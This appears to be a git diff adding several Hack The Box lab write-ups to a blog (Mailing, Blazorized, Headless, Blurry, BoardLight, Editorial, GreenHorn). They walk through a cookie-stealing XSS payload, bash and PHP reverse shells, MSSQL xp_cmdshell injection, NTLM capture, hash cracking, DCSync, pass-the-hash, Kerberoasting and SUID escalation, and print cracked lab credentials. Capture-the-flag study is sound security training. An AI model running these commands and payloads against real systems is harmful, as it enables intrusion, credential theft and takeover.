We can use [crackstation](https://crackstation.net/) for crack it or use `hashcat` as alternative
![Image](/assets/img/post/mailing/16.png)
`echo "841bb5acfa6779ae432fd7a4e6600ba7" >> hash2.txt`
```bash
hashcat -m 0 -a 0 -o cracked.txt hash2.txt /usr/share/wordlists/rockyou.txt
```
- `m 0` sets the mode to MD5.
- `a 0` specifies a dictionary attack.
![Image](/assets/img/post/mailing/17.png)
841bb5acfa6779ae432fd7a4e6600ba7:`homenetworkingadministrator`
## **Telnet**
I'm using Telnet to verify if I can access the mail using this password.
![Image](/assets/img/post/mailing/18.png)
![Image](/assets/img/post/mailing/19.png)
But we cant do anything, there is no exploitable email in the mailbox, but now that I have the credentials of the mail server, I thought that I could obtain NTLM by forcing access to the responder.
`NTLM Hash (Windows Challenge/Response) is the cryptographic format in which user passwords are stored on Windows systems.`
[**¿How works the NTLM Authentication?**](https://www.ionos.mx/digitalguide/servidores/know-how/ntlm/)
After investigating some CVEs, I found one that allows me to send an email to the Maya user found in the log, for to capture an NTLM password.
## CVE-2024-21413
`sudo responder -I tun0`
```bash
python3 CVE-2024-21413.py --server mailing.htb --port 587 --username administrator@mailing.htb --password homenetworkingadministrator --sender administrator@mailing.htb --recipient maya@mailing.htb --url '\\10.10.16.20\mailing' --subject HI
```
![Image](/assets/img/post/mailing/20.png)
![Image](/assets/img/post/mailing/21.png)
`Hash from user maya`
```text
maya::MAILING:5e0eb9256971de1f:DEBA7F01E81351DCFEDA3C905CA932E8:010100000000000080BA1036359FDA01E3495C93763B0B450000000002000800460042005600410001001E00570049004E002D003300410035005400350049004F00550048003800330004003400570049004E002D003300410035005400350049004F0055004800380033002E0046004200560041002E004C004F00430041004C000300140046004200560041002E004C004F00430041004C000500140046004200560041002E004C004F00430041004C000700080080BA1036359FDA010600040002000000080030003000000000000000000000000020000080F0D79319E6BB3D505B32F68F03892752BD8DD6272B1FBD42563DB8BA2BE13A0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00310032000000000000000000
```
## Hashcat
`echo "841bb5acfa6779ae432fd7a4e6600ba7" >> hash.txt`
```
hashcat -m 5600 hash.txt -a 0 -o cracked_passwords.txt /usr/share/wordlists/rocky
```
- `m 5600` specifies the NTLMv2 hash mode.
- `a 0` specifies a dictionary attack.
-
![Image](/assets/img/post/mailing/22.png)
![Image](/assets/img/post/mailing/23.png)
## Evil-Winrm
`evil-winrm -i 10.10.11.14 -u maya -p 'm4y4ngs4ri'`
![Image](/assets/img/post/mailing/24.png)
User flag
![Image](/assets/img/post/mailing/25.png)
## **Privilege Escalation**
After researching how to perform Privilege Escalation on a Windows server, I found some CVEs that seem interesting, such as CVE-2023-2255 for LibreOffice.
![Image](/assets/img/post/mailing/26.png)
[_**CVE Libre Office**_](https://github.com/elweth-sec/CVE-2023-2255?tab=readme-ov-file)
**CVE-2023-2255**
`python3 CVE-2023-2255.py --cmd 'net localgroup Administradores maya /add' --output 'exploit.odt'`
To accomplish this, I will embed the user Maya into the exploit.odt file and grant permissions to the local group Administradores.
## **SMB Server**
There is an important documents folder under C:. Note that the folder has administrator rights to run.
![Image](/assets/img/post/mailing/27.png)
Most likely you put the odt file in there (important documents) and then get the admin shell
`impacket-smbserver mailing` pwd `-smb2support`
![Image](/assets/img/post/mailing/28.png)
Let the Maya user, running in `evil-winrm`, connect and copy the `exploit.odt` file into the `Important Documents` directory, prompting Maya to click and run the `exploit.odt` file.
```
net use \\\\10.10.16.20\\mailing
copy \\\\10.10.16.20\\mailing\\exploit.odt
```
![Image](/assets/img/post/mailing/29.png)
After waiting for a few seconds, I'll check the status of the Maya user.
`net user maya`
## **Dump SAM Hash**
![Image](/assets/img/post/mailing/30.png)
⭐_HackTool:Win32/Dump is a command line tool that dumps password hashes from Windows NT's SAM(Security Accounts Manager) database. The dumped password hashes can be fed into an NT password auditing tool, such as L0phtCrack to recover the passwords of Windows NT users._
**`crackmapexec smb 10.10.11.14 -u maya -p "m4y4ngs4ri" --sam`**
- `crackmapexec smb`: Specifies that `crackmapexec` will be used to interact with the SMB protocol. `crackmapexec` is a versatile tool used for pentesting the security of network services, SMB being one of them.
- `u maya`: This flag followed by `maya` specifies the username to be used when authenticating to the SMB service on the target machine.
- `p "m4y4ngs4ri"`: This flag followed by `"m4y4ngs4ri"` specifies the password for the username provided. Together with the username, this forms the credentials used for SMB authentication.
- `-sam`: This is an option that instructs `crackmapexec` to attempt to dump the SAM (Security Account Manager) database. The SAM database stores user credentials in a Windows system, typically hashed passwords. Dumping the SAM can be used to retrieve these hashes, which can then be cracked offline to obtain plaintext passwords.
![Image](/assets/img/post/mailing/31.png)
## **Remote Windows machine using WMIExec**
`impacket-wmiexec localadmin@10.10.11.14 -hashes aad3b435b51404eeaad3b435b51404ee:9aa582783780d1546d62f2d102daefae`
- `impacket-wmiexec`: This is a script from the Impacket suite, which is a collection of Python classes for working with network protocols. `impacket-wmiexec` is specifically designed for executing commands remotely on Windows systems using WMI.
- `localadmin@10.10.11.14`:
- `localadmin` is the username being used to authenticate.
- `10.10.11.14` is the IP address of the target machine where commands will be executed.
- `hashes aad3b435b51404eeaad3b435b51404ee:9aa582783780d1546d62f2d102daefae`:
- `hashes` specifies that hash values are being used instead of a plaintext password for authentication.
- `aad3b435b51404eeaad3b435b51404ee` is the LM hash. It is often a placeholder since LM hashing is less secure and frequently disabled in modern systems.
- `9aa582783780d1546d62f2d102daefae` is the NT hash, which is the hash of the actual password for the account.
[Impacket-wmiexec](https://tools.thehacker.recipes/impacket)
![Image](/assets/img/post/mailing/32.png)
`Root`

288
_posts/2024-01-08-blazorized.md Normal file
View File

@ -0,0 +1,288 @@
---
title: HTB - Blazorized
date: 2024-02-02 12:17:34 -0400
categories: [hackthebox , Blazorized]
tags: [HackTheBox, NTLM, Evil-winrm, nmap, hashcat, Movement Lateral, Active Directory, BloodHound, mimikatz, logoncount, Blazor, metasploit, sqlinjection, powershell, winPEAS]
image:
path: /assets/img/post/blazorized/Blazorized-card.png
lqip: data:image/webp;base64,UklGRpoAAABXRUJQVlA4WAoAAAAQAAAADwAABwAAQUxQSDIAAAARL0AmbZurmr57yyIiqE8oiG0bejIYEQTgqiDA9vqnsUSI6H+oAERp2HZ65qP/VIAWAFZQOCBCAAAA8AEAnQEqEAAIAAVAfCWkAALp8sF8rgRgAP7o9FDvMCkMde9PK7euH5M1m6VWoDXf2FkP3BqV0ZYbO6NA/VFIAAAA
alt: Hack the Box - Blazorized.
---
## Box Info
| Name | Blazorized |
| :-------------------- | ---------------: |
| Release Date | 02 Mar, 2024 |
| OS | Windows |
| Rated Difficulty | Medium |
## **Enumeration**
Tip:
![Image](/assets/img/post/blazorized/0.png)
## **Nmap**
![Image](/assets/img/post/blazorized/1.png)
## Web
![Image](/assets/img/post/blazorized/2.png)
Puerto{: filepath} `445 Microsoft Directory Services`
```bash
smbclient -L //blazorized.htb
```
![Image](/assets/img/post/blazorized/3.png)
## Scan Subdomains
```bash
wfuzz -c -w /usr/share/wordlists/amass/subdomains-top1mil-5000.txt --hc 400,403,404,302 -H "Host: FUZZ.blazorized.htb" -u http://blazorized.htb -t 100
```
![Image](/assets/img/post/blazorized/4.png)
With ffuf
```bash
ffuf -c -u "http://blazorized.htb" -H "host: FUZZ.blazorized.htb" -w /usr/share/wordlists/amass/subdomains-top1mil-5000.txt -fc 301,302 -mc all
```
![Image](/assets/img/post/blazorized/5.png)
We found a subdomain called 'admin,' and we added it to our hosts.
Web application on port 80 is built with the `Blazor WebAssembly`
![Image](/assets/img/post/blazorized/6.png)
Blazor webassembly works with Js and json
![Image](/assets/img/post/blazorized/7.png)
We found a script write in js
![Image](/assets/img/post/blazorized/8.png)
For read better the code we need to copy and paste to beautifier.io Web.
![Image](/assets/img/post/blazorized/9.png)
We found a interesting path.
![Image](/assets/img/post/blazorized/10.png)
The _framework folder contains essential files for the operation of the Blazor application, including `.dll files`, `resources`, and `configuration files`.
- `/_framework/blazor.webassembly.js`: Essential for running Blazor apps
- `/_framework/wasm/`: Contains WebAssembly binaries
Download the DLLs for decompile
![Image](/assets/img/post/blazorized/11.png)
## DLL Ananlysis
Decompile DLLs using `DNSpy` in windows.
![Image](/assets/img/post/blazorized/12.png)
`eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy93cy8yMDA1LzA1L2lkZW50aXR5L2NsYWltcy9lbWFpbGFkZHJlc3MiOiJzdXBlcmFkbWluQGJsYXpvcml6ZWQuaHRiIiwiaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93cy8yMDA4LzA2L2lkZW50aXR5L2NsYWltcy9yb2xlIjoiU3VwZXJfQWRtaW4iLCJpc3MiOiJodHRwOi8vYXBpLmJsYXpvcml6ZWQuaHRiIiwiYXVkIjoiaHR0cDovL2FkbWluLmJsYXpvcml6ZWQuaHRiIiwiZXhwIjoxNzIwMDAwMDAwfQ.tJptKXJlG9KDSjxR9Y3gxdcSy7fHj-50GS6_Dd9PAOk`
Build a jwt for Super_Admin
![Image](/assets/img/post/blazorized/13.png)
**Set the jwt token to Local Storage:**
![Image](/assets/img/post/blazorized/14.png)
We need use this for secret key for jwt (dont forget)
![Image](/assets/img/post/blazorized/15.png)
Now we have to copy the string create in jwt.io web and storage local in the web.
![Image](/assets/img/post/blazorized/16.png)
![Image](/assets/img/post/blazorized/17.png)
In the section "Check Duplicate" from the web,It make a search in the database, if some category is duplicate, so we a exploit this with SQLinjection
![Image](/assets/img/post/blazorized/18.png)
The web run a microsoft sql for a get a revshell. [Hacktricks](https://book.hacktricks.xyz/v/es/network-services-pentesting/pentesting-mssql-microsoft-sql-server)
![Image](/assets/img/post/blazorized/19.png)
Now we are going to use these commands and find out if we are successful.
![Image](/assets/img/post/blazorized/20.png)
```shell
test'; EXEC sp_configure 'show advanced options',1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE;-- -
```
```shell
test'; exec master..xp_cmdshell 'powershell -e *powershellBased64*';-- -
```
## Nu_1055
We got the shell!!.
![Image](/assets/img/post/blazorized/21.png)
Change the shell to a meterpreter shell, create a payload, upload and execute.
![Image](/assets/img/post/blazorized/22.png)
![Image](/assets/img/post/blazorized/23.png)
![Image](/assets/img/post/blazorized/24.png)
This practice is more convenient for executing certain commands that we cannot perform in the previous shell.
![Image](/assets/img/post/blazorized/25.png)
It is a tool for visualizing relationships and permissions within an Active Directory (AD) or Azure environment (Azure Active Directory, AAD).
[BloodHound](https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1)
Upload with metasploit to victim machine and execute the follow command:
```shell
powershell -exec bypass -command "Import-Module ./SharpHound.ps1; Invoke-BloodHound -c all"
```
![Image](/assets/img/post/blazorized/26.png)
Download with the metasploit the .zip in owner attack machine
![Image](/assets/img/post/blazorized/27.png)
![Image](/assets/img/post/blazorized/28.png)
![Image](/assets/img/post/blazorized/29.png)
## Movement Lateral
Extract the zip and use it to BloodHound
<https://www.freebuf.com/articles/web/288370.html>
![Image](/assets/img/post/blazorized/30.png)
### WriteSPN
- BloodHound reveals that `NU_1055` has `writeSPN Privilege` on the `RSA_4801` account
- Vulnerable to SPN-jacking
![Image](/assets/img/post/blazorized/31.png)
![Image](/assets/img/post/blazorized/32.png)
Upload the PowerView.ps1 with metasploit and execute:
set SPN
```shell
Set-DomainObject -Identity RSA_4810 -SET @{serviceprincipalname='test/test'}
```
Request Service Ticket
```shell
Get-DomainSPNTicket -SPN test/test
```
![Image](/assets/img/post/blazorized/33.png)
<https://www.netwrix.com/cracking_kerberos_tgs_tickets_using_kerberoasting.html>
**Tip**: make the hash use all space in your file txt
this :
![Image](/assets/img/post/blazorized/34.png)
to this:
![Image](/assets/img/post/blazorized/35.png)
#### Hashcat
Cracked the hash with **hashcat**
```bash
hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt -o found.txt --force
```
![Image](/assets/img/post/blazorized/36.png)
password: `(Ni7856Do9854Ki05Ng0005 #)`
![Image](/assets/img/post/blazorized/37.png)
Use evil-winrm for login as RSA_4810:
```javascript
sudo evil-winrm -i blazorized.htb -u RSA_4810 -p '(Ni7856Do9854Ki05Ng0005 #)'
```
### RSA_4810
![Image](/assets/img/post/blazorized/38.png)
Use the PowerView.ps1 and upload to RSA_4810 for use Get-NetUser command
![Image](/assets/img/post/blazorized/39.png)
### SSA_6010
The another users has a `logoncount` 0 and the user `SSA_6010` has a logoncount 4236.
LogonCount is a login count, a property that is part of the profile information in an `Active Directory (AD)` environment.
![Image](/assets/img/post/blazorized/40.png)
From Bloodhound we can see that RSA_4810 is member of group Remote_Support_Administrators.
Upload `winPEAS` and Run and it show us a writeable file path.
We have write privilege under A32FF3AEAA23 directory in SYSVOL.
icacls A32FF3AEAA23
![Image](/assets/img/post/blazorized/41.png)
```shell
'powershell -e *base64*' | Out-File -FilePath C:\windows\SYSVOL\sysvol\blazorized.htb\scripts\A32FF3AEAA23\revshell.bat -Encoding ASCII
```
```shell
Set-ADUser -Identity SSA_6010 -ScriptPath 'A32FF3AEAA23\revshell.bat'
```
![Image](/assets/img/post/blazorized/42.png)
Wait a second and get the shell for SSA_6010 and upload the SharpHound or look again
and see the option "Find Principals with DCSync Rights" and see the SSA_6010 has a DCSync
![Image](/assets/img/post/blazorized/43.png)
Upload a mimikatz.exe and execute the following command:
lsadump::dcsync /domain:blazorized.htb /user:Administrator
![Image](/assets/img/post/blazorized/44.png)
And we got the NTHASH for used in evil-winrm
![Image](/assets/img/post/blazorized/45.png)
Rooted

136
_posts/2024-01-09-headless.md Normal file
View File

@ -0,0 +1,136 @@
---
title: HTB - Headless
date: 2024-02-02 12:17:34 -0400
categories: [hackthebox , Headless]
tags: [HackTheBox, Python Werkzeug, XSS, User-Agent]
image:
path: /assets/img/post/headless/Headless-card.png
lqip: data:image/webp;base64,UklGRpoAAABXRUJQVlA4WAoAAAAQAAAADwAABwAAQUxQSDIAAAARL0AmbZurmr57yyIiqE8oiG0bejIYEQTgqiDA9vqnsUSI6H+oAERp2HZ65qP/VIAWAFZQOCBCAAAA8AEAnQEqEAAIAAVAfCWkAALp8sF8rgRgAP7o9FDvMCkMde9PK7euH5M1m6VWoDXf2FkP3BqV0ZYbO6NA/VFIAAAA
alt: Hack the Box - Headless.
---
## Box Info
| Name | Headless |
| :-------------------- | ---------------: |
| Release Date | 23 Mar, 2024 |
| OS | Linux |
| Rated Difficulty | Easy |
## **Enumeration**
```bash
nmap -A -Pn 10.10.11.8 -oG allPorts
```
![Image](/assets/img/post/headless/1.png)
[http://10.10.11.8:5000/](http://10.10.11.8:5000/)
![Image](/assets/img/post/headless/2.png)
## Scan Directory
We dont found anything interesting...
![Image](/assets/img/post/headless/3.png)
### BurpSuite
Now go to /support
![Image](/assets/img/post/headless/5.png)
And we try to intercept this with Burpsuite
![Image](/assets/img/post/headless/4.png)
If I try some HTML injection returns the HTTP request content.
![Image](/assets/img/post/headless/attemp.png)
The HTTP `response` headers show its a `Werkzeug / Python server`
**Exploitation**
**Blind XSS on User-Agent**
Try to figerout a large time i found the XSS over header put in a `header-false: a<script>alert(1)</script>`
`<img src=x onerror=fetch('http://<IP>:<PORT>/'+document.cookie);>`
![Image](/assets/img/post/headless/6.png)
**Python Server**
`python -m http.server 8020`
![Image](/assets/img/post/headless/7.png)
![Image](/assets/img/post/headless/8.png)
After Exploit XSS at User-Agent, we get a reply back with the **admin cookie** at the python server
![Image](/assets/img/post/headless/9.png)
[http://10.10.11.8:5000/dashboard](http://10.10.11.8:5000/dashboard)
![Image](/assets/img/post/headless/10.png)
![Image](/assets/img/post/headless/11.png)
**Reverse Shell**
![Image](/assets/img/post/headless/12.png)
```
#!/bin/bash
/bin/bash -c 'exec bash -i >& /dev/tcp/<IP>/<PORT> 0>&1'
#Create Reverse Shell script into a file, In my case I create .sh
```
![Image](/assets/img/post/headless/13.png)
![Image](/assets/img/post/headless/14.png)
![Image](/assets/img/post/headless/15.png)
![Image](/assets/img/post/headless/16.png)
**User Flag**
## Privilege Escalation
#### Check sudo -l
![Image](/assets/img/post/headless/17.png)
Syscheck
cat /usr/bin/syscheck:
![Image](/assets/img/post/headless/18.png)
### Exploit [initdb.sh](http://initdb.sh)
`echo "chmod u+s /bin/bash" > initdb.sh chmod +x initdb.sh`
- `chmod u+s /bin/bash`: Sets the set-user-ID (SUID) permission on `/bin/bash`, allowing users to execute the bash shell with the file owner's (typically root) privileges.
- `chmod +x initdb.sh`: This command changes the permissions of the file `initdb.sh`, making it executable (`+x`) by the file's owner, group, and others. This allows the script to be run as a program by the user.
![Image](/assets/img/post/headless/19.png)
```
sudo /usr/bin/syscheck
/bin/bash -p
```
`/bin/bash -p`: starts a bash shell with root privileges retained, due to the SUID bit making the shell run with the file owner's (root's) effective ID.
![Image](/assets/img/post/headless/20.png)
**Root Flag**

96
_posts/2024-01-10-blurry.md Normal file
View File

@ -0,0 +1,96 @@
---
title: HTB - Blurry
date: 2024-02-02 12:17:34 -0400
categories: [hackthebox , Blurry]
tags: [HackTheBox, CVE-2024-24590, ClearML, pickle files, pth files,artifact, API]
image:
path: /assets/img/post/blurry/Blurry.png
lqip: data:image/webp;base64,UklGRpoAAABXRUJQVlA4WAoAAAAQAAAADwAABwAAQUxQSDIAAAARL0AmbZurmr57yyIiqE8oiG0bejIYEQTgqiDA9vqnsUSI6H+oAERp2HZ65qP/VIAWAFZQOCBCAAAA8AEAnQEqEAAIAAVAfCWkAALp8sF8rgRgAP7o9FDvMCkMde9PK7euH5M1m6VWoDXf2FkP3BqV0ZYbO6NA/VFIAAAA
alt: Hack the Box - Blurry.
---
## Box Info
| Name | Blurry |
| :-------------------- | ---------------: |
| Release Date | 30 Mar, 2024 |
| OS | Linux |
| Rated Difficulty | Medium |
## **Enumeration**
```bash
nmap -p- --open --min-rate 5000 -sS -vvv -n -Pn 10.10.11.19 -oG allports
nmap -sCV -p 22,80 10.10.11.19 -oN targeted
```
![Image](/assets/img/post/blurry/0.png)
```bash
echo " 10.10.11.19 app.blurry.htb" | sudo tee -a /etc/hosts
```
## ClearML
![Image](/assets/img/post/blurry/1.png)
At this point, it is important to know what clear ML is and how it works.
After much searching and gathering information, I found that we can connect through a Python package called clearml-agent and create an environment.
During the research process, I found that clearml has a **`CVE-2024-24590: Pickle Load on Artifact Get`**.
## CVE-2024-24590
*ClearML involves the inherent insecurity of pickle files. We discovered that an attacker could create a pickle file containing arbitrary code and upload it as an artifact to a project via the API. When a user calls the get method within the Artifact class to download and load a file into memory, the pickle file is deserialized on their system, running any arbitrary code it contains.*
<https://hiddenlayer.com/research/not-so-clear-how-mlops-solutions-can-muddy-the-waters-of-your-supply-chain/#The-Vulns>
![Image](/assets/img/post/blurry/3.png)
### Create credentials
To do this, we need to create new credentials to connect through clearml-agent, and to set up, we use the 'init' option.
![Image](/assets/img/post/blurry/4.png)
We press enter on the options and boom, we're connected.
![Image](/assets/img/post/blurry/5.png)
So once connected, we'll proceed to exploit the vulnerability.
![Image](/assets/img/post/blurry/6.png)
<https://clear.ml/docs/latest/docs/guides/reporting/using_artifacts/
<https://davidhamann.de/2020/04/05/exploiting-python-pickle/>
![Image](/assets/img/post/blurry/7.png)
## Privilege Escalation
### Sudo -l
Once **I had the reverse shell**, I continued with my enumeration and found a vulnerability with 'sudo -l
![Image](/assets/img/post/blurry/2.png)
I dug into the files and found that when executing /usr/bin/`evaluate_model`, it ran the `demo_model.pth`, which in turn executed the .py file located in `/models/`{: .filepath}. So, I modified the .py file to obtain a reverse shell.
![Image](/assets/img/post/blurry/8.png)
<https://www.revshells.com/>
But be careful, it runs with 'sudo' as it doesn't require a password to execute it, so we'll obtain a privileged reverse shell.
```bash
sudo evaluate_model /models/demo_model.pth
```
![Image](/assets/img/post/blurry/9.png)
With netcat listening the port 9001
![Image](/assets/img/post/blurry/10.png)
**`Root`**
![Image](/assets/img/post/blurry/11.png)

114
_posts/2024-01-11-boardlight.md Normal file
View File

@ -0,0 +1,114 @@
---
title: HTB - BoardLight
date: 2024-02-02 12:17:34 -0400
categories: [hackthebox , BoardLight]
tags: [HackTheBox, Dolibarr, PHP, CVE-2023-30253, LinPEAS, CVE-2022-37706]
image:
path: /assets/img/post/boardlight/BoardLight-card.png
lqip: data:image/webp;base64,UklGRpoAAABXRUJQVlA4WAoAAAAQAAAADwAABwAAQUxQSDIAAAARL0AmbZurmr57yyIiqE8oiG0bejIYEQTgqiDA9vqnsUSI6H+oAERp2HZ65qP/VIAWAFZQOCBCAAAA8AEAnQEqEAAIAAVAfCWkAALp8sF8rgRgAP7o9FDvMCkMde9PK7euH5M1m6VWoDXf2FkP3BqV0ZYbO6NA/VFIAAAA
alt: Hack the Box - BoardLight.
---
## Box Info
| Name | BoardLight |
| :-------------------- | ---------------: |
| Release Date | 25 May, 2024 |
| OS | Linux |
| Rated Difficulty | Easy |
## **Enumeration**
![Image](/assets/img/post/boardlight/0.png)
### SubDomain
```bash
wfuzz -c -w /usr/share/wordlists/amass/subdomains-top1mil-5000.txt "Host: FUZZ.board.htb" -u [](http://board.htb/)[http://board.htb](http://board.htb)
```
![Image](/assets/img/post/boardlight/1.png)
![Image](/assets/img/post/boardlight/2.png)
![Image](/assets/img/post/boardlight/e.png)
![Image](/assets/img/post/boardlight/z.png)
The login page is using the default credentials by Dolibarr
## Dolibarr 17.0.0
### CVE-2023-30253
[`Missing Error Handling | OWASP Foundation`](https://owasp.org/www-community/vulnerabilities/Missing_Error_Handling)
The version Dolibarr 17.0.0 has a vulnerability to `PHP Code injection` (RCE) (CVE-2023-30253)
[Dolibarr confirm RCE in the version 17.0.0](https://github.com/advisories/GHSA-9wqr-5jp4-mjmh)
[Security Advisory: Dolibarr 17.0.0 PHP Code Injection (CVE-2023-30253) - Swascan](https://www.swascan.com/security-advisory-dolibarr-17-0-0/)
![Image](/assets/img/post/boardlight/b.png)
We make a page and use PHP for try to get a reverse shell.
![Image](/assets/img/post/boardlight/x.png)
![Image](/assets/img/post/boardlight/s.png)
```js
<?PHP echp system("whoami");?>
```
![Image](/assets/img/post/boardlight/a.png)
```php
<section id="mysection1" contenteditable="true">
<?PHP echo system("bash -c 'bash -i >& /dev/tcp/10.10.14.88/7777 0>&1'");?>
</section>
```
[https://wiki.dolibarr.org/index.php?title=Backups](https://wiki.dolibarr.org/index.php?title=Backups)
### Credentials
```zsh
$dolibarr_main_db_name='dolibarr'; $dolibarr_main_db_prefix='llx_'; $dolibarr_main_db_user='dolibarrowner'; $dolibarr_main_db_pass='serverfun2$2023!!'; $dolibarr_main_db_type='mysqli';
dolibarrowner
serverfun2$2023!!
cat /etc/passwd | grep bash
SSH:
larissa
serverfun2$2023!!
```
![Image](/assets/img/post/boardlight/3.png)
I found no exploitable points and uploaded linpeas to scan for vulnerabilities.
## LinPEAS
`_LinPEAS is a script that search for possible paths to escalate privileges on Linux/Unix_/MacOS hosts. The checks are explained on [book.hacktricks.xyz](https://book.hacktricks.xyz/linux-hardening/privilege-escalation)_`
[PEASS-ng/linPEAS at master · peass-ng/PEASS-ng](https://github.com/peass-ng/PEASS-ng/tree/master/linPEAS)
## Enlightenment_sys
Enlightenment_sys in some cases could be an internal component or refer to scripts or tools for interacting with Enlightenment; it could also be a module or a configuration depending on the context.
![Image](/assets/img/post/boardlight/4.png)
In this point it's just exploit the CVE for scalation previleges and get the root flag.
[GitHub - MaherAzzouzi/CVE-2022-37706-LPE-exploit: A reliable exploit + write-up to elevate privileges to root. (Tested on Ubuntu 22.04)](https://github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit/tree/main)
Run exploit.sh and you obtained the shell as `root`.

125
_posts/2024-01-12-editorial.md Normal file
View File

@ -0,0 +1,125 @@
---
title: HTB - Editorial
date: 2020-11-18 12:17:34 -0400
categories: [hackthebox , Editorial]
tags: [SSRF, Python, Git]
image:
path: /assets/img/post/editorial/Editorial-card.png
lqip: data:image/webp;base64,UklGRpoAAABXRUJQVlA4WAoAAAAQAAAADwAABwAAQUxQSDIAAAARL0AmbZurmr57yyIiqE8oiG0bejIYEQTgqiDA9vqnsUSI6H+oAERp2HZ65qP/VIAWAFZQOCBCAAAA8AEAnQEqEAAIAAVAfCWkAALp8sF8rgRgAP7o9FDvMCkMde9PK7euH5M1m6VWoDXf2FkP3BqV0ZYbO6NA/VFIAAAA
alt: Hack the Box - Editorial.
---
## Box Info
| Name | Editorial |
| :-------------------- | ---------------: |
| Release Date | 15 Jun, 2024 |
| OS | Linux |
| Rated Difficulty | Easy |
## **Enumeration**
![Image](/assets/img/post/editorial/image.png)
echo "10.10.11.20 editorial.htb" | sudo tee -a /etc/hosts
![Image](/assets/img/post/editorial/image-1.png)
whatweb:
![Image](/assets/img/post/editorial/image-2.png)
Web:
![Image](/assets/img/post/editorial/image-3.png)
dirsearch -u http://editorial.htb/
![Image](/assets/img/post/editorial/image-4.png)
This page is interesting, we can preview an image from a file or url.
![Image](/assets/img/post/editorial/image-5.png)
## SSRF
The file name is renamed and the file extension is removed. When we open the preview image in a new tab, the file downloaded directly, so it seems like we cant execute any shell directly.
When I upload a file and add a url "http://127.0.0.1/" and intercept with BurpSuite, we can see the response 200 OK and showing a image directory location, this point to a `SSRF`.
![Image](/assets/img/post/editorial/image-6.png)
In an [SSRF](https://portswigger.net/web-security/ssrf) attack against the server, the attacker causes the application to make an HTTP request back to the server that is hosting the application, via its loopback network interface. This typically involves supplying a URL with a hostname like `127.0.0.1` (a reserved IP address that points to the loopback adapter) or `localhost` (a commonly used name for the same adapter)
![Image](/assets/img/post/editorial/image-7.png)
The response shows us a directory path, let's download the file and see what's inside.
![Image](/assets/img/post/editorial/image-8.png)
![Image](/assets/img/post/editorial/image-9.png)
![Image](/assets/img/post/editorial/image-10.png)
And re upload the file and add the path in burpsuite.
`/api/latest/metadata/messages/authors`{: .filepath}
![Image](/assets/img/post/editorial/image-11.png)
![Image](/assets/img/post/editorial/image-12.png)
Username: dev - Password: dev080217_devAPI!@
![Image](/assets/img/post/editorial/image-13.png)
user flag
![Image](/assets/img/post/editorial/image-14.png)
![Image](/assets/img/post/editorial/image-15.png)
### Linux Enumeration
```bash
find / -user dev 2>/dev/null | grep -vE "sys|proc"
```
![Image](/assets/img/post/editorial/image-16.png)
![Image](/assets/img/post/editorial/image-17.png)
The command `Git show` displays detailed information about a commit.
![Image](/assets/img/post/editorial/image-18.png)
![Image](/assets/img/post/editorial/image-19.png)
080217_Producti0n_2023!@ for prod
- su `prod`
- password: `080217_Producti0n_2023!@`
## Privilege Escalation
sudo -l
![Image](/assets/img/post/editorial/image-20.png)
```bash
- echo '#!/bin/bash' > /tmp/exploit.sh
- echo 'chmod u+s /bin/bash' >> /tmp/exploit.sh
```
![Image](/assets/img/post/editorial/image-21.png)
```bash
- sudo /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py "ext::sh -c '/tmp/exploit.sh'"
```
![Image](/assets/img/post/editorial/image-22.png)
- `ls -l /bin/bash`
![Image](/assets/img/post/editorial/image-23.png)
Start a new bash session.
- `/bin/bash -p`
![Image](/assets/img/post/editorial/image-24.png)

107
_posts/2024-01-13-greenhorn.md Normal file
View File

@ -0,0 +1,107 @@
---
title: HTB - GreenHorn
date: 2024-02-02 12:17:34 -0400
categories: [hackthebox , GreenHorn]
tags: [HackTheBox, CMS pluck, RCE, User-Agent]
image:
path: /assets/img/post/greenhorn/greenhorn-card.png
lqip: data:image/webp;base64,UklGRpoAAABXRUJQVlA4WAoAAAAQAAAADwAABwAAQUxQSDIAAAARL0AmbZurmr57yyIiqE8oiG0bejIYEQTgqiDA9vqnsUSI6H+oAERp2HZ65qP/VIAWAFZQOCBCAAAA8AEAnQEqEAAIAAVAfCWkAALp8sF8rgRgAP7o9FDvMCkMde9PK7euH5M1m6VWoDXf2FkP3BqV0ZYbO6NA/VFIAAAA
alt: Hack the Box - GreenHorn.
---
## Box Info
| Name | GreenHorn |
| :-------------------- | ---------------: |
| Release Date | 20 Jul, 2024 |
| OS | Linux |
| Rated Difficulty | Easy |
## **Enumeration**
### Information Gathering
#### Scan with nmap:
![Image](/assets/img/post/greenhorn/image.png)
Add the dns to /etc/hosts:
```java
echo "10.10.11.25 greenhorn.htb" | sudo tee -a /etc/hosts
```
```bash
whatweb greenhorn.htb or wappalyzer from web.
```
we have in the bottom a web for `admin` with the `CMS` called '`pluck'`
![Image](/assets/img/post/greenhorn/image-1.png)
## CMS pluck 4.7.18
We found in the web admin the version for the CMS 'pluck' 4.7.18 which have a `RCE vulnerability` but we need a password for login in the pluck CMS so i look at the port 3000 because we have a http with status 200 so investigate i found a web similar to github. After searching, I found credentials I assumed use it to pluck CMS.
![Image](/assets/img/post/greenhorn/image-2.png)
## Gitea
![Image](/assets/img/post/greenhorn/image-3.png)
`iloveyou1`
![Image](/assets/img/post/greenhorn/image-4.png)
## Explotation
I login into pluck CMS and we are inside as administrator in the web and see the version of the pluck cms
![Image](/assets/img/post/greenhorn/image-5.png)
I found a [RCE](https://www.exploit-db.com/exploits/51592) for that version CMS pluck and we go use it
![Image](/assets/img/post/greenhorn/image-6.png)
looked the "upload_url" that tell me the web have a section in "module" of pluck CMS called "installmodule" so we go to investigate and used it
![Image](/assets/img/post/greenhorn/image-7.png)
To perform the RCE we need to make a reverse shell with pentestmonkey in php because the server is mount over apache so i use the pentestmonkey reverse shell for compressed and upload .
![Image](/assets/img/post/greenhorn/image-8.png)
## Privilege Escalation
when upload the zip we need to reload the web http://greenhorn.htb/data/modules/shell/revshell.php and listening with `nc -lvnp 9001` Once reload the web we got the reverse shell as www-data but we go to re-use the password iloveyou1 for login as junior and see the user.txt file.
![Image](/assets/img/post/greenhorn/image-9.png)
